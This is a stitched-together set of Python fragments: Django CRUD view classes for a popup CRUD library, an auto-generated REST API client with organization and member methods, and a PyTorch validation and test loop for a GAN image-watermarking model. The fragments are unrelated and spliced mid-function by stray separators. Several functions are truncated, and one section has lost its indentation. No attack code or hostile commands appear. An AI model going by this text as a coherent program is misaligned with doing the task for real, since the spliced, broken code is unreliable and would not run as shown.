    def form_valid(self, form):  # pylint: disable=missing-docstring
        # Save object and (optional) inline formset atomically.
        self.object = form.save(commit=False)
        formset_class = self._viewset.formset_class
        formset = None
        if formset_class:
            formset = formset_class(
                self.request.POST,
                instance=self.object)
        if not formset or formset.is_valid():
            self.object.save()
            form.save_m2m()
            if formset:
                formset.save()
            if self.request.is_ajax():
                return self.get_ajax_response()
            return super(AjaxObjectFormMixin, self).form_valid(form)
        # invalid formset: redisplay the page with both form and formset errors
        kwargs = {'form': form}
        if formset:
            kwargs.update({'formset': formset})
        return self.render_to_response(self.get_context_data(**kwargs))

    def handle_no_permission(self):
        # AJAX callers get a rendered 403 fragment instead of a redirect.
        if self.request.is_ajax():
            return render_to_response('popupcrud/403.html')
        return super(AjaxObjectFormMixin, self).handle_no_permission()
class AttributeThunk(object):
    """
    Thunks the attributes that Django's generic CRUD views expect into
    lookups on the parent viewset instance. This lets every CRUD view option
    be declared exactly once, as a ViewSet property and/or method.
    """

    def __init__(self, viewset, *args, **kwargs):
        # Store a viewset *instance* (not the class) and hand it a
        # back-reference so viewset methods can reach the active view.
        self._viewset = viewset()
        self._viewset.view = self
        super(AttributeThunk, self).__init__(*args, **kwargs)

    @property
    def model(self):
        """Model class the CRUD views operate on."""
        return self._viewset.model

    @property
    def fields(self):
        """Field list used to build the default ModelForm."""
        return self._viewset.fields

    @property
    def context_object_name(self):
        return self._viewset.context_object_name

    @property
    def pk_url_kwarg(self):
        return self._viewset.pk_url_kwarg

    @property
    def slug_field(self):
        return self._viewset.slug_field

    @property
    def slug_url_kwarg(self):
        return self._viewset.slug_url_kwarg

    def get_success_url(self):
        """After a successful create/update/delete, return to the list view."""
        return self._viewset.get_list_url()

    def get_form_kwargs(self):
        """Merge the viewset's extra form kwargs into the view's own."""
        form_kwargs = super(AttributeThunk, self).get_form_kwargs()  # pylint: disable=E1101
        form_kwargs.update(self._viewset.get_form_kwargs())
        return form_kwargs

    def get_context_data(self, **kwargs):
        """Add the popupcrud template variables shared by all CRUD views."""
        viewset = self._viewset
        kwargs['base_template'] = POPUPCRUD['base_template']
        title_cv = POPUPCRUD['page_title_context_variable']
        kwargs[title_cv] = kwargs['pagetitle']
        kwargs['viewset'] = viewset
        crumbs_var = viewset.breadcrumbs_context_variable
        kwargs[crumbs_var] = copy.deepcopy(viewset.get_breadcrumbs())
        if not self.request.is_ajax() and not isinstance(self, ListView):  # pylint: disable=E1101
            # legacy (non-popup) crud views get the list view appended to
            # their breadcrumb trail
            kwargs[crumbs_var].append(
                (viewset.get_page_title('list'), viewset.get_list_url()))
        viewset.get_context_data(kwargs)
        return super(AttributeThunk, self).get_context_data(**kwargs)  # pylint: disable=E1101

    @property
    def login_url(self):
        """View-specific ``<view>_login_url`` if set, else the global value."""
        return getattr(self._viewset,
                       "%s_login_url" % self._get_view_code(),
                       self._viewset.login_url)

    @property
    def raise_exception(self):
        """View-specific ``<view>_raise_exception`` if set, else the global value."""
        return getattr(self._viewset,
                       "%s_raise_exception" % self._get_view_code(),
                       self._viewset.raise_exception)

    def get_permission_required(self):
        return self._viewset.get_permission_required(self._get_view_code())

    def _get_view_code(self):
        """Map the concrete view class name to its short ViewSet code."""
        return {
            'ListView': 'list',
            'DetailView': 'detail',
            'CreateView': 'create',
            'UpdateView': 'update',
            'DeleteView': 'delete',
        }[self.__class__.__name__]

    @property
    def media(self):
        """Aggregate the static assets (css/js) needed by the CRUD views."""
        popups = self._viewset.popups
        media = forms.Media(
            css={'all': ('popupcrud/css/popupcrud.css',)},
            js=('popupcrud/js/popupcrud.js',))
        # Form and formset media matter only on Create/Update views, or on a
        # ListView that opens create/update popups.
        needs_form_media = (
            isinstance(self, (CreateView, UpdateView)) or
            popups['create'] or popups['update'])
        if needs_form_media:
            # NOTE(review): media of forms built via modelform_factory() is
            # not collected here -- confirm whether that is needed.
            if self._viewset.form_class:
                media += self._viewset.form_class(
                    **self._viewset.get_form_kwargs()).media
            formset_class = self._viewset.formset_class
            if formset_class:
                media.add_js(('popupcrud/js/jquery.formset.js',))
                media += formset_class().media
        return media
class ListView(AttributeThunk, PaginationMixin, PermissionRequiredMixin,
generic.ListView):
""" Model list view """
    def __init__(self, viewset_cls, *args, **kwargs):
        """Capture request-derived list state (filter params, search query).

        NOTE(review): assumes the instantiator supplies the current request in
        ``kwargs['request']`` (raises KeyError otherwise) -- confirm against
        the code that constructs this view.
        """
        super(ListView, self).__init__(viewset_cls, *args, **kwargs)
        request = kwargs['request']
        self.params = dict(request.GET.items())  # raw GET params (ordering etc.)
        self.query = request.GET.get(SEARCH_VAR, '')  # current search term
        self.lookup_opts = self.model._meta
def get_paginate_by(self, queryset):
return self._viewset.get_paginate_by()
    def get_queryset(self):
        """Return the list queryset: viewset-filtered and request-ordered."""
        qs = super(ListView, self).get_queryset()
        # give the viewset a chance to filter/annotate the base queryset
        qs = self._viewset.get_queryset(qs)
        # apply column ordering derived from the request's ORDER_VAR parameter
        ordering = self._get_ordering(self.request, qs)
        qs = qs.order_by(*ordering)
        # NOTE(review): the search term (self.query) is not applied here --
        # confirm whether filtering happens elsewhere or is unimplemented.
        return qs
def get_template_names(self):
templates = super(ListView, self).get_template_names()
# if the viewset customized listview template, make sure that is
# looked for first by putting its name in the front of the list
if getattr(self._viewset, 'list_template', None):
templates.insert(0, self._viewset.list_template)
# make the default template of lower priority than the one
# determined by default -- <model>_list.html
templates.append("popupcrud/list.html")
return templates
def get_context_data(self, **kwargs):
kwargs['pagetitle'] = self._viewset.get_page_title('list')
context = super(ListView, self).get_context_data(**kwargs)
context['model_options'] = self._viewset.model._meta
context['new_button_text'] = ugettext("New {0}").format(
self._viewset.model._meta.verbose_name)
context['new_url'] = self._viewset.get_new_url()
context['new_item_dialog_title'] = ugettext("New {0}").format(
self.model._meta.verbose_name)
context['edit_item_dialog_title'] = ugettext("Edit {0}").format(
self.model._meta.verbose_name)
context['legacy_crud'] = self._viewset.legacy_crud
modal_sizes = copy.deepcopy(DEFAULT_MODAL_SIZES)
modal_sizes.update(self._viewset.modal_sizes)
context['modal_sizes'] = modal_sizes
return context
def _get_default_ordering(self):
ordering = []
if self._viewset.ordering:
ordering = self._viewset.ordering
elif self.lookup_opts.ordering:
ordering = self.lookup_opts.ordering
return ordering
    def get_ordering_field(self, field_name):
        """
        Returns the proper model field name corresponding to the given
        field_name to use for ordering. field_name may either be the name of a
        proper model field or the name of a method (on the viewset or model)
        or a callable with the 'order_field' attribute. Returns None if no
        proper model field name can be matched.
        """
        try:
            field = self.lookup_opts.get_field(field_name)
            return field.name
        except FieldDoesNotExist:
            # field_name is not a real model field: treat it as a callable,
            # a viewset attribute or a model attribute (in that order) and
            # honour its optional 'order_field' annotation.
            if callable(field_name):
                attr = field_name
            elif hasattr(self._viewset, field_name):
                attr = getattr(self._viewset, field_name)
            else:
                attr = getattr(self.model, field_name)
            return getattr(attr, 'order_field', None)
def _get_ordering(self, request, queryset):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
params = self.params
ordering = list(self._get_default_ordering())
if ORDER_VAR in params:
# Clear ordering and used params
ordering = []
order_params = params[ORDER_VAR].split('.')
for p in order_params:
try:
_, pfx, idx = p.rpartition('-')
field_name = self._viewset.list_display[int(idx)]
order_field = self.get_ordering_field(field_name)
if not order_field:
continue # No 'order_field', skip it
# reverse order if order_field has already "-" as prefix
if order_field.startswith('-') and pfx == "-":
ordering.append(order_field[1:])
else:
ordering.append(pfx + order_field)
except (IndexError, ValueError):
continue # Invalid ordering specified, skip it.
# Add the given query's ordering fields, if any.
ordering.extend(queryset.query.order_by)
# Ensure that the primary key | |
timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["owner"]
all_params.extend(
[
"async_req",
"_return_http_data_only",
"_preload_content",
"_request_timeout",
]
)
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_organization" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and (
"owner" not in local_var_params
or local_var_params["owner"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `owner` when calling `delete_organization`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "owner" in local_var_params:
path_params["owner"] = local_var_params["owner"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = ["ApiKey"] # noqa: E501
return self.api_client.call_api(
"/api/v1/orgs/{owner}",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def delete_organization_member(self, owner, user, **kwargs): # noqa: E501
"""Delete organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_organization_member(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str user: Memeber under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.delete_organization_member_with_http_info(
owner, user, **kwargs
) # noqa: E501
def delete_organization_member_with_http_info(
self, owner, user, **kwargs
): # noqa: E501
"""Delete organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_organization_member_with_http_info(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str user: Memeber under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["owner", "user"]
all_params.extend(
[
"async_req",
"_return_http_data_only",
"_preload_content",
"_request_timeout",
]
)
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_organization_member" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and (
"owner" not in local_var_params
or local_var_params["owner"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `owner` when calling `delete_organization_member`"
) # noqa: E501
# verify the required parameter 'user' is set
if self.api_client.client_side_validation and (
"user" not in local_var_params
or local_var_params["user"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `user` when calling `delete_organization_member`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "owner" in local_var_params:
path_params["owner"] = local_var_params["owner"] # noqa: E501
if "user" in local_var_params:
path_params["user"] = local_var_params["user"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = ["ApiKey"] # noqa: E501
return self.api_client.call_api(
"/api/v1/orgs/{owner}/members/{user}",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_organization(self, owner, **kwargs): # noqa: E501
"""Get organization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Organization
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_organization_with_http_info(owner, **kwargs) # noqa: E501
def get_organization_with_http_info(self, owner, **kwargs): # noqa: E501
"""Get organization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Organization, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["owner"]
all_params.extend(
[
"async_req",
"_return_http_data_only",
"_preload_content",
"_request_timeout",
]
)
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and (
"owner" not in local_var_params
or local_var_params["owner"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `owner` when calling `get_organization`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "owner" in local_var_params:
path_params["owner"] = local_var_params["owner"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = ["ApiKey"] # noqa: E501
return self.api_client.call_api(
"/api/v1/orgs/{owner}",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="V1Organization", # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_organization_member(self, owner, user, **kwargs): # noqa: E501
"""Get organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_member(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str user: Memeber under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1OrganizationMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_organization_member_with_http_info(
owner, user, **kwargs
) # noqa: E501
def get_organization_member_with_http_info(
self, owner, user, **kwargs
): # noqa: E501
"""Get organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_member_with_http_info(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param | |
%.4f \tbatchtime: %.4f' % (
epoch, opt.niter, i, len(train_loader),
Hlosses.val, Rlosses.val, R_mselosses.val, R_consistlosses.val, Dlosses.val, FakeDlosses.val, RealDlosses.val, Ganlosses.val, Pixellosses.val, Vgglosses.val, SumLosses.val, data_time.val, batch_time.val)
if i % opt.logFrequency == 0:
print_log(log, logPath)
else:
# 只把log写入log 文件,不在控制台打印信息
print_log(log, logPath, console=False)
# #if epoch % 1 == 0 and i % opt.resultPicFrequency == 0:
# diff = 50 * (container_img - cover_imgv)
# save_result_pic(this_batch_size, cover_img_A, cover_imgv.data, container_img.data,
# secret_img, rev_secret_img.data, clean_rev_secret_img_A.data, clean_rev_secret_img_B.data, diff.data, epoch, i, opt.trainpics)
# if epoch % 1 == 0 and i % opt.resultPicFrequency == 0:
diff = 50 * (container_img - cover_imgv)
if i % opt.resultPicFrequency == 0:
with torch.no_grad():
'''
1 cover_img_A是原图(A域)
2 cover_imgv是B域的ground_truth图像b
3 container_img 是嵌入水印后的图片B'
4 secret_img是水印图像
5 rev_secret_img是从B'中提取的水印图像
6 clean_rev_secret_img_A 是从A中提取的水印图像(应为空白)
7 clean_rev_secret_img_B是从B中提取的水印图像(应为空白)
8 diff 是嵌入水印后的图像B'和不嵌入水印的图像的diff
排列为:
A、ground-truth B、B'、 diff(B-B')、clean_A_watermark、clean_B_watermark、B' watermark、ground truth watermark
'''
save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, epoch, i, trainpicsDir)
# save_result_pic(this_batch_size, cover_img_A, cover_imgv, container_img,
# secret_img, rev_secret_img, clean_rev_secret_img_A, clean_rev_secret_img_B, diff, epoch, i, opt.trainpics)
epoch_log = "one epoch time is %.4f======================================================================" % (
batch_time.sum) + "\n"
epoch_log = epoch_log + "epoch learning rate: optimizerH_lr = %.8f optimizerR_lr = %.8f optimizerD_lr = %.8f" % (
optimizerH.param_groups[0]['lr'], optimizerR.param_groups[0]['lr'], optimizerD.param_groups[0]['lr']) + "\n"
epoch_log = epoch_log + "epoch_Hloss=%.6f\tepoch_Rloss=%.6f\tepoch_R_mseloss=%.6f\tepoch_R_consistloss=%.6f\tepoch_Dloss=%.6f\tepoch_FakeDloss=%.6f\tepoch_RealDloss=%.6f\tepoch_GanLoss=%.6fepoch_Pixelloss=%.6f\tepoch_Vggloss=%.6f\tepoch_sumLoss=%.6f" % (
Hlosses.avg, Rlosses.avg, R_mselosses.avg, R_consistlosses.avg, Dlosses.avg, FakeDlosses.avg, RealDlosses.avg, Ganlosses.avg, Pixellosses.avg, Vgglosses.avg, SumLosses.avg)
print_log(epoch_log, logPath)
writer.add_scalar("lr/H_lr", optimizerH.param_groups[0]['lr'], epoch)
writer.add_scalar("lr/R_lr", optimizerR.param_groups[0]['lr'], epoch)
writer.add_scalar("lr/D_lr", optimizerD.param_groups[0]['lr'], epoch)
writer.add_scalar("lr/beta", opt.beta, epoch)
writer.add_scalar('train/R_loss', Rlosses.avg, epoch)
writer.add_scalar('train/R_mse_loss', R_mselosses.avg, epoch)
writer.add_scalar('train/R_consist_loss', R_consistlosses.avg, epoch)
writer.add_scalar('train/H_loss', Hlosses.avg, epoch)
writer.add_scalar('train/D_loss', Dlosses.avg, epoch)
writer.add_scalar('train/FakeD_loss', FakeDlosses.avg, epoch)
writer.add_scalar('train/RealD_loss', RealDlosses.avg, epoch)
writer.add_scalar('train/Gan_loss', Ganlosses.avg, epoch)
writer.add_scalar('train/Pixel_loss', Pixellosses.avg, epoch)
writer.add_scalar('train/Vgg_loss', Vgglosses.avg, epoch)
writer.add_scalar('train/sum_loss', SumLosses.avg, epoch)
def validation(val_loader, epoch, Hnet, Rnet, Dnet, validpicsDir):
    """Run one validation pass and return the averaged loss components.

    Each batch item is assumed to be a bare (C, 256, 512) tensor holding the
    domain-A image in columns 0:256 and the domain-B ground truth in columns
    256:512 -- TODO confirm the loader yields tensors, not (img, label) pairs.

    :param Hnet: hiding network (embeds the watermark into the B image)
    :param Rnet: reveal network (extracts the watermark)
    :param Dnet: discriminator
    :param validpicsDir: directory receiving sample result pictures
    :return: tuple of averaged losses (hloss, rloss, r_mseloss, r_consistloss,
        dloss, fakedloss, realdloss, ganloss, pixelloss, vggloss, sumloss)
    """
    print(
        "#################################################### validation begin ########################################################")
    start_time = time.time()
    # inference mode for all three networks (affects dropout/batch-norm)
    Hnet.eval()
    Rnet.eval()
    Dnet.eval()
    # running averages of each loss term over the whole validation set
    Hlosses = AverageMeter()
    Rlosses = AverageMeter()
    R_mselosses = AverageMeter()
    R_consistlosses = AverageMeter()
    Dlosses = AverageMeter()
    FakeDlosses = AverageMeter()
    RealDlosses = AverageMeter()
    Ganlosses = AverageMeter()
    Pixellosses = AverageMeter()
    Vgglosses = AverageMeter()
    # Tensor type used for the adversarial label tensors (CUDA assumed)
    Tensor = torch.cuda.FloatTensor
    with torch.no_grad():
        loader = transforms.Compose(
            [
                transforms.ToTensor(), ])
        # fixed targets: an all-"clean" (blank) image and the secret watermark
        clean_img = Image.open(os.path.join(root, "secret/clean.png"))
        clean_img=loader(clean_img)
        secret_img=Image.open(os.path.join(
            root, "secret/flower.png"))
        secret_img=loader(secret_img)
        for i, data in tqdm(enumerate(val_loader, 0)):
            # zero_grad() is inert under no_grad(); kept to mirror training
            Hnet.zero_grad()
            Rnet.zero_grad()
            Dnet.zero_grad()
            this_batch_size=int(data.size()[0])
            cover_img=data[0:this_batch_size, :, :, :]
            # split the side-by-side pair: A = left half, B = right half
            cover_img_A=cover_img[:, :, 0:256, 0:256]
            cover_img_B=cover_img[:, :, 0:256, 256:512]
            # tile the fixed targets to the batch size, then keep the first
            # this_batch_size copies (re-tiles the previous batch's tensor
            # after iteration one -- redundant but harmless)
            secret_img=secret_img.repeat(this_batch_size, 1, 1, 1)
            secret_img=secret_img[0:this_batch_size, :, :, :]
            clean_img=clean_img.repeat(this_batch_size, 1, 1, 1)
            clean_img=clean_img[0:this_batch_size, :, :, :]
            if opt.cuda:
                cover_img=cover_img.cuda()
                cover_img_A=cover_img_A.cuda()
                cover_img_B=cover_img_B.cuda()
                secret_img=secret_img.cuda()
                clean_img=clean_img.cuda()
            # hiding-net input: B image channel-concatenated with the secret
            concat_img=torch.cat([cover_img_B, secret_img], dim = 1)
            concat_imgv=Variable(concat_img)
            cover_imgv=Variable(cover_img_B)
            # container: watermarked version of B produced by the hiding net
            container_img=Hnet(concat_imgv)
            A_imgv=Variable(cover_img_A)
            # Adversarial ground truths, sized from the discriminator output
            pred_fake=Dnet(container_img)
            valid=Variable(
                Tensor(np.ones((cover_imgv.size(0), pred_fake.size(1), pred_fake.size(2), pred_fake.size(3)))), requires_grad = False)
            fake=Variable(
                Tensor(np.zeros((cover_imgv.size(0), pred_fake.size(1), pred_fake.size(2), pred_fake.size(3)))), requires_grad = False)
            # hiding-net losses: GAN + pixel + VGG-feature + plain MSE
            gan_loss=criterion_GAN(pred_fake, valid)
            pixel_loss=criterion_pixelwise(container_img, cover_imgv)
            vgg_loss=mse_loss(vgg(container_img).relu2_2,
                              vgg(cover_imgv).relu2_2)
            errH=opt.betamse * mse_loss(container_img, cover_imgv) + opt.betagans * gan_loss + opt.betapix * pixel_loss + opt.betavgg * vgg_loss
            # Discriminator: real loss on B, fake loss on the container
            pred_real=Dnet(cover_imgv)
            loss_real=criterion_GAN(pred_real, valid)
            pred_fake=Dnet(container_img.detach())
            loss_fake=criterion_GAN(pred_fake, fake)
            errD=10000 * 0.5 * (loss_real + loss_fake)
            # Reveal net: recover the watermark from the container ...
            rev_secret_img=Rnet(container_img)
            secret_imgv=Variable(secret_img)
            errR_mse=opt.betamse * mse_loss(rev_secret_img, secret_imgv)
            # ... and expect a blank extraction from unwatermarked A and B
            clean_rev_secret_img_A=Rnet(A_imgv)
            clean_imgv=Variable(clean_img)
            errR_clean_A=opt.betamse * \
                mse_loss(clean_rev_secret_img_A, clean_imgv)
            clean_rev_secret_img_B=Rnet(cover_imgv)
            clean_imgv=Variable(clean_img)
            errR_clean_B=opt.betamse * \
                mse_loss(clean_rev_secret_img_B, clean_imgv)
            errR_clean=opt.betacleanA * errR_clean_A + opt.betacleanB * errR_clean_B
            # consistency: both batch halves should reveal the same watermark
            half_batchsize=int(this_batch_size / 2)
            errR_consist=opt.betamse * \
                mse_loss(rev_secret_img[0:half_batchsize, :, :, :],
                         rev_secret_img[half_batchsize:half_batchsize * 2, :, :, :])
            errR = errR_mse + opt.betacons * errR_consist + opt.betaclean * errR_clean
            betaerrR_secret = opt.beta * errR
            err_sum = errH + betaerrR_secret
            # batch-size-weighted running averages
            Hlosses.update(errH.data, this_batch_size)
            Rlosses.update(errR.data, this_batch_size)
            R_mselosses.update(errR_mse.data, this_batch_size)
            R_consistlosses.update(errR_consist.data, this_batch_size)
            Dlosses.update(errD.data, this_batch_size)
            FakeDlosses.update(loss_fake.data, this_batch_size)
            RealDlosses.update(loss_real.data, this_batch_size)
            Ganlosses.update(gan_loss.data, this_batch_size)
            Pixellosses.update(pixel_loss.data, this_batch_size)
            Vgglosses.update(vgg_loss.data, this_batch_size)
            # dump a qualitative result grid every 1000 batches
            if i % 1000 == 0:
                diff = 50 * (container_img - cover_imgv)
                with torch.no_grad():
                    save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, epoch, i , validpicsDir)
    val_hloss = Hlosses.avg
    val_rloss = Rlosses.avg
    val_r_mseloss = R_mselosses.avg
    val_r_consistloss = R_consistlosses.avg
    val_dloss = Dlosses.avg
    val_fakedloss = FakeDlosses.avg
    val_realdloss = RealDlosses.avg
    val_Ganlosses = Ganlosses.avg
    val_Pixellosses = Pixellosses.avg
    val_Vgglosses = Vgglosses.avg
    val_sumloss = val_hloss + opt.beta * val_rloss
    val_time = time.time() - start_time
    val_log = "validation[%d] val_Hloss = %.6f\t val_Rloss = %.6f\t val_R_mseloss = %.6f\t val_R_consistloss = %.6f\t val_Dloss = %.6f\t val_FakeDloss = %.6f\t val_RealDloss = %.6f\t val_Ganlosses = %.6f\t val_Pixellosses = %.6f\t val_Vgglosses = %.6f\t val_Sumloss = %.6f\t validation time=%.2f" % (
        epoch, val_hloss, val_rloss, val_r_mseloss, val_r_consistloss, val_dloss, val_fakedloss, val_realdloss, val_Ganlosses, val_Pixellosses, val_Vgglosses, val_sumloss, val_time)
    print_log(val_log, logPath)
    # tensorboard scalars for this epoch
    writer.add_scalar('validation/H_loss_avg', Hlosses.avg, epoch)
    writer.add_scalar('validation/R_loss_avg', Rlosses.avg, epoch)
    writer.add_scalar('validation/R_mse_loss', R_mselosses.avg, epoch)
    writer.add_scalar('validation/R_consist_loss', R_consistlosses.avg, epoch)
    writer.add_scalar('validation/D_loss_avg', Dlosses.avg, epoch)
    writer.add_scalar('validation/FakeD_loss_avg', FakeDlosses.avg, epoch)
    writer.add_scalar('validation/RealD_loss_avg', RealDlosses.avg, epoch)
    writer.add_scalar('validation/Gan_loss_avg', val_Ganlosses, epoch)
    writer.add_scalar('validation/Pixel_loss_avg', val_Pixellosses, epoch)
    writer.add_scalar('validation/Vgg_loss_avg', val_Vgglosses, epoch)
    writer.add_scalar('validation/sum_loss_avg', val_sumloss, epoch)
    print("#################################################### validation end ########################################################")
    return val_hloss, val_rloss, val_r_mseloss, val_r_consistloss, val_dloss, val_fakedloss, val_realdloss, val_Ganlosses, val_Pixellosses, val_Vgglosses, val_sumloss
def test(test_loader, Hnet, Rnet, testpicsDir):
    """Run the hiding/reveal networks over the test set and save result grids.

    No losses are computed; this only produces qualitative result pictures in
    *testpicsDir* via save_result_pic(). Batch layout assumption is the same
    as in validation(): side-by-side (A | B) 256x512 images.
    """
    print(
        "#################################################### test begin ########################################################")
    start_time = time.time()
    # inference mode
    Hnet.eval()
    Rnet.eval()
    # Tensor type
    Tensor = torch.cuda.FloatTensor
    with torch.no_grad():
        loader = transforms.Compose(
            [
             transforms.ToTensor(), ])
        # fixed targets: blank ("clean") image and the secret watermark
        clean_img = Image.open(os.path.join(root, "secret/clean.png"))
        clean_img = loader(clean_img)
        secret_img = Image.open(os.path.join(
            root, "secret/flower.png"))
        secret_img = loader(secret_img)
        for i, data in enumerate(test_loader, 0):
            # inert under no_grad(); kept to mirror the training loop
            Hnet.zero_grad()
            Rnet.zero_grad()
            this_batch_size = int(data.size()[0])
            cover_img = data[0:this_batch_size, :, :, :]
            # split the side-by-side pair: A = left half, B = right half
            cover_img_A = cover_img[:, :, 0:256, 0:256]
            cover_img_B = cover_img[:, :, 0:256, 256:512]
            # tile the fixed targets to the batch size (re-tiled every batch)
            secret_img = secret_img.repeat(this_batch_size, 1, 1, 1)
            secret_img = secret_img[0:this_batch_size, :, :, :]
            clean_img = clean_img.repeat(this_batch_size, 1, 1, 1)
            clean_img = clean_img[0:this_batch_size, :, :, :]
            if opt.cuda:
                cover_img = cover_img.cuda()
                cover_img_A = cover_img_A.cuda()
                cover_img_B = cover_img_B.cuda()
                secret_img = secret_img.cuda()
                clean_img = clean_img.cuda()
            concat_img = torch.cat([cover_img_B, secret_img], dim=1)
            concat_imgv = Variable(concat_img)
            cover_imgv = Variable(cover_img_B)
            # container_img: watermarked version of B from the hiding net
            container_img = Hnet(concat_imgv)
            A_imgv = Variable(cover_img_A)
            # rev_secret_img: watermark recovered from the container
            rev_secret_img = Rnet(container_img)
            secret_imgv = Variable(secret_img)
            # watermarks extracted from plain A and B (expected to be blank)
